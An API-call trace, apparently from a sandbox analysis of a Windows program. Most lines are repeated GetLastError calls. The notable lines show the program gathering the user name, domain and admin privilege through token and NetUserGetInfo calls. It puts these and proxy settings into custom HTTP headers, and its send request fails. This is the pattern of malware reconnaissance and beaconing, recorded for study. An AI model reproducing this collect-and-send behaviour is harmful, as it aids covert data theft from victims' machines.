	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.962] GetLastError () returned 0x0
	[0122.963] wsprintfW (in: param_1=0x396d0f0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0122.963] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0122.963] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0122.963] GetCurrentProcess () returned 0xffffffff
	[0122.963] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x205f2c4 | out: TokenHandle=0x205f2c4*=0x698) returned 1
	[0122.963] GetTokenInformation (in: TokenHandle=0x698, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x205f2a0 | out: TokenInformation=0x0, ReturnLength=0x205f2a0) returned 0
	[0122.963] GetLastError () returned 0x7a
	[0122.963] GetTokenInformation (in: TokenHandle=0x698, TokenInformationClass=0x1, TokenInformation=0x392b068, TokenInformationLength=0x24, ReturnLength=0x205f2a0 | out: TokenInformation=0x392b068, ReturnLength=0x205f2a0) returned 1
	[0122.963] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x392b070*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x699910, cchName=0x205f294, ReferencedDomainName=0x698ee8, cchReferencedDomainName=0x205f294, peUse=0x205f288 | out: Name="Nd9E1FYi", cchName=0x205f294, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x205f294, peUse=0x205f288) returned 1
	[0122.964] CloseHandle (hObject=0x698) returned 1
	[0122.964] CloseHandle (hObject=0xffffffff) returned 1
	[0122.964] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39ac6c0*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x186772d, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39ac757, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0122.969] GetLastError () returned 0x0
	[0122.969] GetLastError () returned 0x0
	[0122.969] GetLastError () returned 0x0
	[0122.969] GetLastError () returned 0x0
	[0122.969] GetLastError () returned 0x0
	[0122.969] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.970] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.971] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.972] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.973] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.974] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] GetLastError () returned 0x0
	[0122.975] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0122.975] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0122.975] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0122.975] NetApiBufferFree (Buffer=0x39ac6c0) returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.993] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.994] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.995] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0122.996] wsprintfW (in: param_1=0x396d0f0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0122.996] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0122.996] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.996] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.997] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0122.998] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.998] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] GetLastError () returned 0x0
	[0122.999] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0122.999] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0122.999] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0122.999] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x424) returned 0x0
	[0123.000] RegQueryValueExW (in: hKey=0x424, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0123.000] RegCloseKey (hKey=0x424) returned 0x0
	[0123.001] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0123.001] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0123.001] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0123.001] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0
	[0123.014] GetLastError () returned 0x2ee7
	[0123.014] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x702b0000
	[0123.014] FormatMessageA (in: dwFlags=0x1b00, lpSource=0x702b0000, dwMessageId=0x2ee7, dwLanguageId=0x0, lpBuffer=0x205f8d8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x18Ð\x96\x03") returned 0x32
	[0123.035] LocalFree (hMem=0x396d018) returned 0x0
	[0123.035] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0123.035] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0123.035] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.035] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.036] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
